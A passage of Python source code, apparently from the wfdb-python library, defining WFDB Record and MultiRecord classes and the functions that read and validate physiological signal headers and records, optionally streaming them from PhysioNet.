ValueError('sampto must be greater than sampfrom')\n\n # Channel Ranges\n if len(channels):\n if min(channels) < 0:\n raise ValueError('Input channels must all be non-negative integers')\n if max(channels) > self.n_sig - 1:\n raise ValueError('Input channels must all be lower than the total number of channels')\n\n if return_res not in [64, 32, 16, 8]:\n raise ValueError(\"return_res must be one of the following: 64, 32, 16, 8\")\n if physical is True and return_res == 8:\n raise ValueError(\"return_res must be one of the following when physical is True: 64, 32, 16\")\n\n # Cannot expand multiple samples/frame for multi-segment records\n if isinstance(self, MultiRecord):\n if smooth_frames is False:\n raise ValueError('This package version cannot expand all samples when reading multi-segment records. 
Must enable frame smoothing.')\n\n\n def _adjust_datetime(self, sampfrom):\n \"\"\"\n Adjust date and time fields to reflect user input if possible.\n\n Helper function for the `_arrange_fields` of both Record and\n MultiRecord objects.\n \"\"\"\n if sampfrom:\n dt_seconds = sampfrom / self.fs\n if self.base_date and self.base_time:\n self.base_datetime = datetime.datetime.combine(self.base_date,\n self.base_time)\n self.base_datetime += datetime.timedelta(seconds=dt_seconds)\n self.base_date = self.base_datetime.date()\n self.base_time = self.base_datetime.time()\n # We can calculate the time even if there is no date\n elif self.base_time:\n tmp_datetime = datetime.datetime.combine(\n datetime.datetime.today().date(), self.base_time)\n self.base_time = (tmp_datetime\n + datetime.timedelta(seconds=dt_seconds)).time()\n # Cannot calculate date or time if there is only date\n\n\n\nclass Record(BaseRecord, _header.HeaderMixin, _signal.SignalMixin):\n \"\"\"\n The class representing single segment WFDB records.\n\n Record objects can be created using the initializer, by reading a WFDB\n header with `rdheader`, or a WFDB record (header and associated dat files)\n with `rdrecord`.\n\n The attributes of the Record object give information about the record as\n specified by: https://www.physionet.org/physiotools/wag/header-5.htm\n\n In addition, the d_signal and p_signal attributes store the digital and\n physical signals of WFDB records with at least one channel.\n\n Examples\n --------\n >>> record = wfdb.Record(record_name='r1', fs=250, n_sig=2, sig_len=1000,\n file_name=['r1.dat','r1.dat'])\n\n \"\"\"\n def __init__(self, p_signal=None, d_signal=None,\n e_p_signal=None, e_d_signal=None,\n record_name=None, n_sig=None,\n fs=None, counter_freq=None, base_counter=None,\n sig_len=None, base_time=None, base_date=None,\n file_name=None, fmt=None, samps_per_frame=None,\n skew=None, byte_offset=None, adc_gain=None,\n baseline=None, units=None, adc_res=None,\n adc_zero=None, init_value=None, checksum=None,\n block_size=None, sig_name=None, comments=None):\n\n # Note the lack of the 'n_seg' field. Single segment records cannot\n # have this field. 
Even n_seg = 1 makes the header a multi-segment\n # header.\n\n super(Record, self).__init__(record_name, n_sig,\n fs, counter_freq, base_counter, sig_len,\n base_time, base_date, comments, sig_name)\n\n self.p_signal = p_signal\n self.d_signal = d_signal\n self.e_p_signal = e_p_signal\n self.e_d_signal = e_d_signal\n\n self.file_name = file_name\n self.fmt = fmt\n self.samps_per_frame = samps_per_frame\n self.skew = skew\n self.byte_offset = byte_offset\n self.adc_gain = adc_gain\n self.baseline = baseline\n self.units = units\n self.adc_res = adc_res\n self.adc_zero = adc_zero\n self.init_value = init_value\n self.checksum = checksum\n self.block_size = block_size\n\n # Equal comparison operator for objects of this type\n def __eq__(self, other, verbose=False):\n att1 = self.__dict__\n att2 = other.__dict__\n\n if set(att1.keys()) != set(att2.keys()):\n if verbose:\n print('Attributes members mismatch.')\n return False\n\n for k in att1.keys():\n\n v1 = att1[k]\n v2 = att2[k]\n\n if type(v1) != type(v2):\n if verbose:\n print('Mismatch in attribute: %s' % k, v1, v2)\n return False\n\n if type(v1) == np.ndarray:\n # Necessary for nans\n np.testing.assert_array_equal(v1, v2)\n else:\n if v1 != v2:\n if verbose:\n print('Mismatch in attribute: %s' % k, v1, v2)\n return False\n\n return True\n\n\n def wrsamp(self, expanded=False, write_dir=''):\n \"\"\"\n Write a wfdb header file and any associated dat files from this\n object.\n\n Parameters\n ----------\n expanded : bool, optional\n Whether to write the expanded signal (e_d_signal) instead\n of the uniform signal (d_signal).\n write_dir : str, optional\n The directory in which to write the files.\n\n \"\"\"\n # Perform field validity and cohesion checks, and write the\n # header file.\n self.wrheader(write_dir=write_dir)\n if self.n_sig > 0:\n # Perform signal validity and cohesion checks, and write the\n # associated dat files.\n self.wr_dats(expanded=expanded, write_dir=write_dir)\n\n\n def _arrange_fields(self, channels, sampfrom=0, expanded=False):\n \"\"\"\n Arrange/edit object fields to reflect user channel and/or signal\n range input.\n\n Parameters\n ----------\n channels : list\n List of channel numbers specified.\n sampfrom : int, optional\n Starting sample number read.\n expanded : bool, optional\n Whether the record was read in expanded mode.\n\n \"\"\"\n\n # Rearrange signal specification fields\n for field in _header.SIGNAL_SPECS.index:\n item = getattr(self, field)\n setattr(self, field, [item[c] for c in channels])\n\n # Expanded signals - multiple samples per frame.\n if expanded:\n # Checksum and init_value to be updated if present\n # unless the whole signal length was input\n if self.sig_len != int(len(self.e_d_signal[0]) / self.samps_per_frame[0]):\n self.checksum = self.calc_checksum(expanded)\n self.init_value = [s[0] for s in self.e_d_signal]\n\n self.n_sig = len(channels)\n self.sig_len = int(len(self.e_d_signal[0]) / self.samps_per_frame[0])\n\n # MxN numpy array d_signal\n else:\n # Checksum and init_value to be updated if present\n # unless the whole signal length was input\n if self.sig_len != self.d_signal.shape[0]:\n\n if self.checksum is not None:\n self.checksum = self.calc_checksum()\n if self.init_value is not None:\n ival = list(self.d_signal[0, :])\n self.init_value = [int(i) for i in ival]\n\n # Update record specification parameters\n # Important that these get updated after^^\n self.n_sig = len(channels)\n self.sig_len = self.d_signal.shape[0]\n\n # Adjust date and time if necessary\n 
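# Added example: with fs=250 Hz and sampfrom=500, the call below shifts the\n # recorded start time forward by 500 / 250 = 2 seconds.\n 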
self._adjust_datetime(sampfrom=sampfrom)\n\n\nclass MultiRecord(BaseRecord, _header.MultiHeaderMixin):\n \"\"\"\n The class representing multi-segment WFDB records.\n\n MultiRecord objects can be created using the initializer, or by reading a\n multi-segment WFDB record using 'rdrecord' with the `m2s` (multi to single)\n input parameter set to False.\n\n The attributes of the MultiRecord object give information about the entire\n record as specified by: https://www.physionet.org/physiotools/wag/header-5.htm\n\n In addition, the `segments` parameter is a list of Record objects\n representing each individual segment, or None representing empty segments,\n of the entire multi-segment record.\n\n Notably, this class has no attribute representing the signals as a whole.\n The 'multi_to_single' instance method can be called on MultiRecord objects\n to return a single segment representation of the record as a Record object.\n The resulting Record object will have its 'p_signal' field set.\n\n Examples\n --------\n >>> record_m = wfdb.MultiRecord(record_name='rm', fs=50, n_sig=8,\n sig_len=9999, seg_name=['rm_1', '~', 'rm_2'],\n seg_len=[800, 200, 900])\n >>> # Get a MultiRecord object\n >>> record_s = wfdb.rdrecord('s00001-2896-10-10-00-31', m2s=False)\n >>> # Turn it into a single Record object\n >>> record_s = record_s.multi_to_single()\n\n record_s initially stores a `MultiRecord` object, and is then converted into\n a `Record` object.\n\n \"\"\"\n def __init__(self, segments=None, layout=None,\n record_name=None, n_sig=None, fs=None,\n counter_freq=None, base_counter=None,\n sig_len=None, base_time=None, base_date=None,\n seg_name=None, seg_len=None, comments=None,\n sig_name=None, sig_segments=None):\n\n\n super(MultiRecord, self).__init__(record_name, n_sig,\n fs, counter_freq, base_counter, sig_len,\n base_time, base_date, comments, sig_name)\n\n self.layout = layout\n self.segments = segments\n self.seg_name = seg_name\n self.seg_len = seg_len\n self.sig_segments = sig_segments\n\n\n def wrsamp(self, write_dir=''):\n \"\"\"\n Write a multi-segment header, along with headers and dat files\n for all segments, from this object.\n \"\"\"\n # Perform field validity and cohesion checks, and write the\n # header file.\n self.wrheader(write_dir=write_dir)\n # Perform record validity and cohesion checks, and write the\n # associated segments.\n for seg in self.segments:\n seg.wrsamp(write_dir=write_dir)\n\n def _check_segment_cohesion(self):\n \"\"\"\n Check the cohesion of the segments field with other fields used\n to write the record\n \"\"\"\n\n if self.n_seg != len(self.segments):\n raise ValueError(\"Length of segments must match the 'n_seg' field\")\n\n totalsig_len = 0\n for i in range(self.n_seg):\n s = self.segments[i]\n\n # If segment 0 is a layout specification record, check that its file names are all == '~'\n if i == 0 and self.seg_len[0] == 0:\n for file_name in s.file_name:\n if file_name != '~':\n raise ValueError(\"Layout specification records must have all file_names named '~'\")\n\n # Sampling frequencies must all match the one in the master header\n if s.fs != self.fs:\n raise ValueError(\"The 'fs' in each segment must match the overall record's 'fs'\")\n\n # Check the signal length of the segment against the corresponding seg_len field\n if s.sig_len != self.seg_len[i]:\n raise ValueError('The signal length of segment '+str(i)+' does not match the corresponding segment length')\n\n totalsig_len = totalsig_len + getattr(s, 'sig_len')\n\n # No need to check the sum of sig_lens from each segment object against sig_len\n # 
Already effectively done it when checking sum(seg_len) against sig_len\n\n\n\n def _required_segments(self, sampfrom, sampto):\n \"\"\"\n Determine the segments and the samples within each segment in a\n multi-segment record, that lie within a sample range.\n\n Parameters\n ----------\n sampfrom : int\n The starting sample number to read for each channel.\n sampto : int\n The sample number at which to stop reading for each channel.\n\n \"\"\"\n\n # The starting segment with actual samples\n if self.layout == 'fixed':\n startseg = 0\n else:\n startseg = 1\n\n # Cumulative sum of segment lengths (ignoring layout segment)\n cumsumlengths = list(np.cumsum(self.seg_len[startseg:]))\n # Get first segment\n seg_numbers = [[sampfrom < cs for cs in cumsumlengths].index(True)]\n # Get final segment\n if sampto == cumsumlengths[len(cumsumlengths) - 1]:\n seg_numbers.append(len(cumsumlengths) - 1)\n else:\n seg_numbers.append([sampto <= cs for cs in cumsumlengths].index(True))\n\n # Add 1 for variable layout records\n seg_numbers = list(np.add(seg_numbers,startseg))\n\n # Obtain the sampfrom and sampto to read for each segment\n if seg_numbers[1] == seg_numbers[0]:\n # Only one segment to read\n seg_numbers = [seg_numbers[0]]\n # The segment's first sample number relative to the entire record\n segstartsamp = sum(self.seg_len[0:seg_numbers[0]])\n readsamps = [[sampfrom-segstartsamp, sampto-segstartsamp]]\n\n else:\n # More than one segment to read\n seg_numbers = list(range(seg_numbers[0], seg_numbers[1]+1))\n readsamps = [[0, self.seg_len[s]] for s in seg_numbers]\n\n # Starting sample for first segment.\n readsamps[0][0] = sampfrom - ([0] + cumsumlengths)[seg_numbers[0]-startseg]\n\n # End sample for last segment\n readsamps[-1][1] = sampto - ([0] + cumsumlengths)[seg_numbers[-1]-startseg]\n\n return (seg_numbers, readsamps)\n\n\n def _required_channels(self, seg_numbers, channels, dir_name, pb_dir):\n \"\"\"\n Get the channel numbers to be read from each specified segment,\n given the channel numbers specified for the entire record.\n\n Parameters\n ----------\n seg_numbers : list\n List of segment numbers to read.\n channels : list\n The channel indices to read for the whole record. Same one\n specified by user input.\n\n Returns\n -------\n required_channels : list\n List of lists, containing channel indices to read for each\n desired segment.\n\n \"\"\"\n\n # Fixed layout. All channels are the same.\n if self.layout == 'fixed':\n required_channels = [channels] * len(seg_numbers)\n # Variable layout: figure out channels by matching record names\n else:\n required_channels = []\n # The overall layout signal names\n l_sig_names = self.segments[0].sig_name\n # The wanted signals\n w_sig_names = [l_sig_names[c] for c in channels]\n\n # For each segment\n for i in range(len(seg_numbers)):\n # Skip empty segments\n if self.seg_name[seg_numbers[i]] == '~':\n required_channels.append([])\n else:\n # Get the signal names of the current segment\n s_sig_names = rdheader(\n os.path.join(dir_name, self.seg_name[seg_numbers[i]]),\n pb_dir=pb_dir).sig_name\n required_channels.append(_get_wanted_channels(\n w_sig_names, s_sig_names))\n\n return required_channels\n\n def _arrange_fields(self, seg_numbers, seg_ranges, channels,\n sampfrom=0, force_channels=True):\n \"\"\"\n Arrange/edit object fields to reflect user channel and/or\n signal range inputs. 
Updates layout specification header if\n necessary.\n\n Parameters\n ----------\n seg_numbers : list\n List of integer segment numbers read.\n seg_ranges: list\n List of integer pairs, giving the sample ranges for each\n segment number read.\n channels : list\n List of channel numbers specified\n sampfrom : int\n Starting sample read.\n force_channels : bool, optional\n Used when reading multi-segment variable layout records.\n Whether to update the layout specification record to match\n the input `channels` argument, or to omit channels in which\n no read segment contains the signals.\n\n \"\"\"\n # Update seg_len values for relevant segments\n for i in range(len(seg_numbers)):\n self.seg_len[seg_numbers[i]] = seg_ranges[i][1] - seg_ranges[i][0]\n\n # Get rid of the segments and segment line parameters\n # outside the desired segment range\n if self.layout == 'fixed':\n self.n_sig = len(channels)\n self.segments = self.segments[seg_numbers[0]:seg_numbers[-1]+1]\n self.seg_name = self.seg_name[seg_numbers[0]:seg_numbers[-1]+1]\n self.seg_len = self.seg_len[seg_numbers[0]:seg_numbers[-1]+1]\n else:\n self.segments = [self.segments[0]] + self.segments[seg_numbers[0]:seg_numbers[-1]+1]\n self.seg_name = [self.seg_name[0]] + self.seg_name[seg_numbers[0]:seg_numbers[-1]+1]\n self.seg_len = [self.seg_len[0]] + self.seg_len[seg_numbers[0]:seg_numbers[-1]+1]\n\n # Update the layout specification segment. At this point it\n # should match the full original header\n\n # Have to inspect existing channels of segments; requested\n # input channels will not be enough on its own because not\n # all signals may be present, depending on which section of\n # the signal was read.\n if not force_channels:\n # The desired signal names.\n desired_sig_names = [self.segments[0].sig_name[ch] for ch in channels]\n # Actual contained signal names of individual segments\n #contained_sig_names = [seg.sig_name for seg in self.segments[1:]]\n contained_sig_names = set([name for seg in self.segments[1:] if seg is not None for name in seg.sig_name])\n # Remove non-present names. Keep the order.\n sig_name = [name for name in desired_sig_names if name in contained_sig_names]\n # Channel indices to keep for signal specification fields\n channels = [self.segments[0].sig_name.index(name) for name in sig_name]\n\n # Rearrange signal specification fields\n for field in _header.SIGNAL_SPECS.index:\n item = getattr(self.segments[0], field)\n setattr(self.segments[0], field, [item[c] for c in channels])\n\n self.segments[0].n_sig = self.n_sig = len(channels)\n if self.n_sig == 0:\n print('No signals of the desired channels are contained in the specified sample range.')\n\n # Update record specification parameters\n self.sig_len = sum([sr[1]-sr[0] for sr in seg_ranges])\n self.n_seg = len(self.segments)\n self._adjust_datetime(sampfrom=sampfrom)\n\n\n def multi_to_single(self, physical, return_res=64):\n \"\"\"\n Create a Record object from the MultiRecord object. All signal\n segments will be combined into the new object's `p_signal` or\n `d_signal` field. For digital format, the signals must have\n the same storage format, baseline, and adc_gain in all segments.\n\n Parameters\n ----------\n physical : bool\n Whether to convert the physical or digital signal.\n return_res : int, optional\n The return resolution of the `p_signal` field. 
Options are:\n 64, 32, and 16.\n\n Returns\n -------\n record : wfdb Record\n The single segment record created.\n\n \"\"\"\n\n # The fields to transfer to the new object\n fields = self.__dict__.copy()\n\n # Remove multirecord fields\n for attr in ['segments', 'seg_name', 'seg_len', 'n_seg']:\n del(fields[attr])\n\n # Figure out single segment fields to set for the new Record\n if self.layout == 'fixed':\n # Get the fields from the first segment\n for attr in ['fmt', 'adc_gain', 'baseline', 'units', 'sig_name']:\n fields[attr] = getattr(self.segments[0], attr)\n else:\n # For variable layout records, inspect the segments for the\n # attribute values.\n\n # Coincidentally, if physical=False, figure out if this\n # conversion can be performed. All signals of the same name\n # must have the same fmt, gain, baseline, and units for all\n # segments.\n\n # The layout header should be updated at this point to\n # reflect channels. We can depend on it for sig_name, but\n # not for fmt, adc_gain, units, and baseline.\n\n # These signal names will be the key\n signal_names = self.segments[0].sig_name\n n_sig = len(signal_names)\n\n # This will be the field dictionary to copy over.\n reference_fields = {'fmt':n_sig*[None], 'adc_gain':n_sig*[None],\n 'baseline':n_sig*[None],\n 'units':n_sig*[None]}\n\n # For physical signals, mismatched fields will not be copied\n # over. For digital, mismatches will cause an exception.\n mismatched_fields = []\n for seg in self.segments[1:]:\n if seg is None:\n continue\n # For each signal, check fmt, adc_gain, baseline, and\n # units of each signal\n for seg_ch in range(seg.n_sig):\n sig_name = seg.sig_name[seg_ch]\n # The overall channel\n ch = signal_names.index(sig_name)\n\n for field in reference_fields:\n item_ch = getattr(seg, field)[seg_ch]\n if reference_fields[field][ch] is None:\n reference_fields[field][ch] = item_ch\n # mismatch case\n elif reference_fields[field][ch] != item_ch:\n if physical:\n mismatched_fields.append(field)\n else:\n raise Exception('This variable layout multi-segment record cannot be converted to single segment, in digital format.')\n # Remove mismatched signal fields for physical signals\n for field in set(mismatched_fields):\n del(reference_fields[field])\n # At this point, the fields should be set for all channels\n fields.update(reference_fields)\n fields['sig_name'] = signal_names\n\n # Figure out signal attribute to set, and its dtype.\n if physical:\n sig_attr = 'p_signal'\n # Figure out the largest required dtype\n dtype = _signal._np_dtype(return_res, discrete=False)\n nan_vals = np.array([self.n_sig * [np.nan]], dtype=dtype)\n else:\n sig_attr = 'd_signal'\n # Figure out the largest required dtype\n dtype = _signal._np_dtype(return_res, discrete=True)\n nan_vals = np.array([_signal._digi_nan(fields['fmt'])], dtype=dtype)\n\n # Initialize the full signal array\n combined_signal = np.repeat(nan_vals, self.sig_len, axis=0)\n\n # Start and end samples in the overall array to place the\n # segment samples into\n start_samps = [0] + list(np.cumsum(self.seg_len)[0:-1])\n end_samps = list(np.cumsum(self.seg_len))\n\n if self.layout == 'fixed':\n # Copy over the signals directly. 
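Each segment i fills rows\n # start_samps[i]:end_samps[i] of the combined array (added note). 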
Recall there are no\n # empty segments in fixed layout records.\n for i in range(self.n_seg):\n combined_signal[start_samps[i]:end_samps[i], :] = getattr(self.segments[i], sig_attr)\n else:\n # Copy over the signals into the matching channels\n for i in range(1, self.n_seg):\n seg = self.segments[i]\n if seg is not None:\n # Get the segment channels to copy over for each\n # overall channel\n segment_channels = _get_wanted_channels(fields['sig_name'],\n seg.sig_name,\n pad=True)\n for ch in range(self.n_sig):\n # Copy over relevant signal\n if segment_channels[ch] is not None:\n combined_signal[start_samps[i]:end_samps[i], ch] = getattr(seg, sig_attr)[:, segment_channels[ch]]\n\n # Create the single segment Record object and set attributes\n record = Record()\n for field in fields:\n setattr(record, field, fields[field])\n setattr(record, sig_attr, combined_signal)\n\n # Use the signal to set record features\n if physical:\n record.set_p_features()\n else:\n record.set_d_features()\n\n return record\n\n\n# ---------------------- Type Specifications ------------------------- #\n\n\n# Allowed types of wfdb header fields, and also attributes defined in\n# this library\nALLOWED_TYPES = dict([[index, _header.FIELD_SPECS.loc[index, 'allowed_types']] for index in _header.FIELD_SPECS.index])\nALLOWED_TYPES.update({'comments': (str,), 'p_signal': (np.ndarray,),\n 'd_signal':(np.ndarray,), 'e_p_signal':(np.ndarray,),\n 'e_d_signal':(np.ndarray,),\n 'segments':(Record, type(None))})\n\n# Fields that must be lists\nLIST_FIELDS = tuple(_header.SIGNAL_SPECS.index) + ('comments', 'e_p_signal',\n 'e_d_signal', 'segments')\n\n\ndef _check_item_type(item, field_name, allowed_types, expect_list=False,\n required_channels='all'):\n \"\"\"\n Check the item's type against a set of allowed types.\n Vary the print message regarding whether the item can be None.\n Helper to `BaseRecord.check_field`.\n\n Parameters\n ----------\n item : any\n The item to check.\n field_name : str\n The field name.\n allowed_types : iterable\n Iterable of types the item is allowed to be.\n expect_list : bool, optional\n Whether the item is expected to be a list.\n required_channels : list, optional\n List of integers specifying which channels of the item must be\n present. May be set to 'all' to indicate all channels. Only used\n if `expect_list` is True, ie. item is a list, and its\n subelements are to be checked.\n\n Notes\n -----\n This is called by `check_field`, which determines whether the item\n should be a list or not. This function should generally not be\n called by the user directly.\n\n \"\"\"\n if expect_list:\n if not isinstance(item, list):\n raise TypeError('Field `%s` must be a list.' 
% field_name)\n\n # All channels of the field must be present.\n if required_channels == 'all':\n required_channels = list(range(len(item)))\n\n for ch in range(len(item)):\n # Check whether the field may be None\n if ch in required_channels:\n allowed_types_ch = allowed_types\n else:\n allowed_types_ch = allowed_types + (type(None),)\n\n if not isinstance(item[ch], allowed_types_ch):\n raise TypeError('Channel %d of field `%s` must be one of the following types:' % (ch, field_name),\n allowed_types_ch)\n else:\n if not isinstance(item, allowed_types):\n raise TypeError('Field `%s` must be one of the following types:' % field_name,\n allowed_types)\n\n\ndef check_np_array(item, field_name, ndim, parent_class, channel_num=None):\n \"\"\"\n Check a numpy array's shape and dtype against required\n specifications.\n\n Parameters\n ----------\n item : numpy array\n The numpy array to check\n field_name : str\n The name of the field to check\n ndim : int\n The required number of dimensions\n parent_class : type\n The parent class of the dtype. ie. np.integer, np.floating.\n channel_num : int, optional\n If not None, indicates that the item passed in is a subelement\n of a list. Indicate this in the error message if triggered.\n\n \"\"\"\n # Check shape\n if item.ndim != ndim:\n error_msg = 'Field `%s` must have ndim == %d' % (field_name, ndim)\n if channel_num is not None:\n error_msg = ('Channel %d of f' % channel_num) + error_msg[1:]\n raise TypeError(error_msg)\n\n # Check dtype\n if not np.issubdtype(item.dtype, parent_class):\n error_msg = 'Field `%s` must have a dtype that subclasses %s' % (field_name, parent_class)\n if channel_num is not None:\n error_msg = ('Channel %d of f' % channel_num) + error_msg[1:]\n raise TypeError(error_msg)\n\n\n#------------------------- Reading Records --------------------------- #\n\n\ndef rdheader(record_name, pb_dir=None, rd_segments=False):\n \"\"\"\n Read a WFDB header file and return a `Record` or `MultiRecord`\n object with the record descriptors as attributes.\n\n Parameters\n ----------\n record_name : str\n The name of the WFDB record to be read, without any file\n extensions. If the argument contains any path delimiter\n characters, the argument will be interpreted as PATH/BASE_RECORD.\n Both relative and absolute paths are accepted. If the `pb_dir`\n parameter is set, this parameter should contain just the base\n record name, and the files will be searched for remotely.\n Otherwise, the data files will be searched for in the local path.\n pb_dir : str, optional\n Option used to stream data from Physiobank. The Physiobank\n database directory from which to find the required record files.\n eg. For record '100' in 'http://physionet.org/physiobank/database/mitdb'\n pb_dir='mitdb'.\n rd_segments : bool, optional\n Used when reading multi-segment headers. If True, segment headers will\n also be read (into the record object's `segments` field).\n\n Returns\n -------\n record : Record or MultiRecord\n The wfdb Record or MultiRecord object representing the contents\n of the header read.\n\n Examples\n --------\n >>> ecg_record = wfdb.rdheader('sample-data/test01_00s')\n\n \"\"\"\n dir_name, base_record_name = os.path.split(record_name)\n dir_name = os.path.abspath(dir_name)\n\n # Read the header file. 
Separate comment and non-comment lines\n header_lines, comment_lines = _header._read_header_lines(base_record_name,\n dir_name, pb_dir)\n\n # Get fields from record line\n record_fields = _header._parse_record_line(header_lines[0])\n\n # Single segment header - Process signal specification lines\n if record_fields['n_seg'] is None:\n # Create a single-segment WFDB record object\n record = Record()\n\n # There are signals\n if len(header_lines)>1:\n # Read the fields from the signal lines\n signal_fields = _header._parse_signal_lines(header_lines[1:])\n # Set the object's signal fields\n for field in signal_fields:\n setattr(record, field, signal_fields[field])\n\n # Set the object's record line fields\n for field in record_fields:\n if field == 'n_seg':\n continue\n setattr(record, field, record_fields[field])\n # Multi segment header - Process segment specification lines\n else:\n # Create a multi-segment WFDB record object\n record = MultiRecord()\n # Read the fields from the segment lines\n segment_fields = _header._read_segment_lines(header_lines[1:])\n # Set the object's segment fields\n for field in segment_fields:\n setattr(record, field, segment_fields[field])\n # Set the object's record fields\n for field in record_fields:\n setattr(record, field, record_fields[field])\n\n # Determine whether the record is fixed or variable\n if record.seg_len[0] == 0:\n record.layout = 'variable'\n else:\n record.layout = 'fixed'\n\n # If specified, read the segment headers\n if rd_segments:\n record.segments = []\n # Get the base record name (could be empty)\n for s in record.seg_name:\n if s == '~':\n record.segments.append(None)\n else:\n record.segments.append(rdheader(os.path.join(dir_name, s),\n pb_dir))\n # Fill in the sig_name attribute\n record.sig_name = record.get_sig_name()\n # Fill in the sig_segments attribute\n record.sig_segments = record.get_sig_segments()\n\n # Set the comments field\n record.comments = [line.strip(' \\t#') for line in comment_lines]\n\n return record\n\n\ndef rdrecord(record_name, sampfrom=0, sampto=None, channels=None,\n physical=True, pb_dir=None, m2s=True, smooth_frames=True,\n ignore_skew=False, return_res=64, force_channels=True,\n channel_names=None, warn_empty=False):\n \"\"\"\n Read a WFDB record and return the signal and record descriptors as\n attributes in a Record or MultiRecord object.\n\n Parameters\n ----------\n record_name : str\n The name of the WFDB record to be read, without any file\n extensions. If the argument contains any path delimiter\n characters, the argument will be interpreted as PATH/BASE_RECORD.\n Both relative and absolute paths are accepted. If the `pb_dir`\n parameter is set, this parameter should contain just the base\n record name, and the files will be searched for remotely.\n Otherwise, the data files will be searched for in the local path.\n sampfrom : int, optional\n The starting sample number to read for all channels.\n sampto : int, or 'end', optional\n The sample number at which to stop reading for all channels.\n Reads the entire duration by default.\n channels : list, optional\n List of integer indices specifying the channels to be read.\n Reads all channels by default.\n physical : bool, optional\n Specifies whether to return signals in physical units in the\n `p_signal` field (True), or digital units in the `d_signal`\n field (False).\n pb_dir : str, optional\n Option used to stream data from Physiobank. The Physiobank\n database directory from which to find the required record files.\n eg. 
For record '100' in 'http://physionet.org/physiobank/database/mitdb'\n pb_dir='mitdb'.\n m2s : bool, optional\n Used when reading multi-segment records. Specifies whether to\n directly return a wfdb MultiRecord object (False), or to convert\n it into and return a wfdb Record object (True).\n smooth_frames : bool, optional\n Used when reading records with signals having multiple samples\n per frame. Specifies whether to smooth the samples in signals\n with more than one sample per frame and return an (MxN) uniform\n numpy array as the `d_signal` or `p_signal` field (True), or to\n return a list of 1d numpy arrays containing every expanded\n sample as the `e_d_signal` or `e_p_signal` field (False).\n ignore_skew : bool, optional\n Used when reading records with at least one skewed signal.\n Specifies whether to apply the skew to align the signals in the\n output variable (False), or to ignore the skew field and load in\n all values contained in the dat files unaligned (True).\n return_res : int, optional\n The numpy array dtype of the returned signals. Options are: 64,\n 32, 16, and 8, where the value represents the numpy int or float\n dtype. Note that the value cannot be 8 when physical is True\n since there is no float8 format.\n force_channels : bool, optional\n Used when reading multi-segment variable layout records. Whether\n to update the layout specification record, and the converted\n Record object if `m2s` is True, to match the input `channels`\n argument, or to omit channels in which no read segment contains\n the signals.\n channel_names : list, optional\n List of channel names to return. If this parameter is specified,\n it takes precedence over `channels`.\n warn_empty : bool, optional\n Whether to display a warning if the specified channel indices\n or names are not contained in the record, and no signal is\n returned.\n\n Returns\n -------\n record : Record or MultiRecord\n The wfdb Record or MultiRecord object representing the contents\n of the record read.\n\n Notes\n -----\n If a signal range or channel selection is specified when calling\n this function, the resulting attributes of the returned object will\n be set to reflect the section of the record that is actually read,\n rather than necessarily the entire record. For example, if\n `channels=[0, 1, 2]` is specified when reading a 12 channel record,\n the 'n_sig' attribute will be 3, not 12.\n\n The `rdsamp` function exists as a simple alternative to `rdrecord`\n for the common purpose of extracting the physical signals and a few\n important descriptor fields.\n\n Examples\n --------\n >>> record = wfdb.rdrecord('sample-data/test01_00s', sampfrom=800,\n channels=[1, 3])\n\n \"\"\"\n\n dir_name, base_record_name = os.path.split(record_name)\n dir_name = os.path.abspath(dir_name)\n\n # Read the header fields\n record = rdheader(record_name, pb_dir=pb_dir, rd_segments=False)\n\n # Set defaults for sampto and channels input variables\n if sampto is None:\n # If the header does not contain the signal length, figure it\n # out from the first dat file. This is only possible for single\n # segment records. 
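The length is inferred\n # from the dat file size and the storage format (added note). 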
If there are no signals, sig_len is 0.\n if record.sig_len is None:\n if record.n_sig == 0:\n record.sig_len = 0\n else:\n record.sig_len = _signal._infer_sig_len(\n file_name=record.file_name[0], fmt=record.fmt[0],\n n_sig=record.file_name.count(record.file_name[0]),\n dir_name=dir_name, pb_dir=pb_dir)\n sampto = record.sig_len\n\n # channel_names takes precedence over channels\n if channel_names is not None:\n # Figure out the channel indices matching the record, if any.\n if isinstance(record, Record):\n reference_record = record\n else:\n if record.layout == 'fixed':\n # Find the first non-empty segment to get the signal\n # names\n first_seg_name = [n for n in record.seg_name if n != '~'][0]\n reference_record = rdheader(os.path.join(dir_name,\n first_seg_name),\n pb_dir=pb_dir)\n else:\n # Use the layout specification header to get the signal\n # names\n reference_record = rdheader(os.path.join(dir_name,\n record.seg_name[0]),\n pb_dir=pb_dir)\n\n channels = _get_wanted_channels(wanted_sig_names=channel_names,\n record_sig_names=reference_record.sig_name)\n\n elif channels is None:\n channels = list(range(record.n_sig))\n\n # Ensure that input fields are valid for the record\n record.check_read_inputs(sampfrom, sampto, channels, physical,\n smooth_frames, return_res)\n\n # If the signal doesn't have the specified channels, there will be\n # no signal. Recall that `rdsamp` is not called on segments of multi\n # segment records if the channels are not present, so this won't\n # break anything.\n if not len(channels):\n old_record = record\n record = Record()\n for attr in _header.RECORD_SPECS.index:\n if attr == 'n_seg':\n continue\n elif attr in ['n_sig', 'sig_len']:\n setattr(record, attr, 0)\n else:\n setattr(record, attr, getattr(old_record, attr))\n if warn_empty:\n print('None of the specified signals were contained in the record')\n\n # A single segment record\n elif isinstance(record, Record):\n\n # Only 1 sample/frame, or frames are smoothed. Return uniform numpy array\n if smooth_frames or max([record.samps_per_frame[c] for c in channels]) == 1:\n # Read signals from the associated dat files that contain\n # wanted channels\n record.d_signal = _signal._rd_segment(record.file_name, dir_name,\n pb_dir, record.fmt,\n record.n_sig, record.sig_len,\n record.byte_offset,\n record.samps_per_frame,\n record.skew, sampfrom, sampto,\n channels, smooth_frames,\n ignore_skew)\n\n # Arrange/edit the object fields to reflect user channel\n # and/or signal range input\n record._arrange_fields(channels=channels, sampfrom=sampfrom,\n expanded=False)\n\n if physical:\n # Perform inplace dac to get physical signal\n record.dac(expanded=False, return_res=return_res, inplace=True)\n\n # Return each sample of the signals with multiple samples per frame\n else:\n record.e_d_signal = _signal._rd_segment(record.file_name, dir_name,\n pb_dir, record.fmt,\n record.n_sig,\n record.sig_len,\n record.byte_offset,\n record.samps_per_frame,\n record.skew, sampfrom,\n sampto, channels,\n smooth_frames, ignore_skew)\n\n # Arrange/edit the object fields to reflect user channel\n # and/or signal range input\n record._arrange_fields(channels=channels, sampfrom=sampfrom,\n expanded=True)\n\n if physical:\n # Perform dac to get physical signal\n record.dac(expanded=True, return_res=return_res, inplace=True)\n\n # A multi segment record\n else:\n # Strategy:\n # 1. Read the required segments and store them in\n # Record objects.\n # 2. 
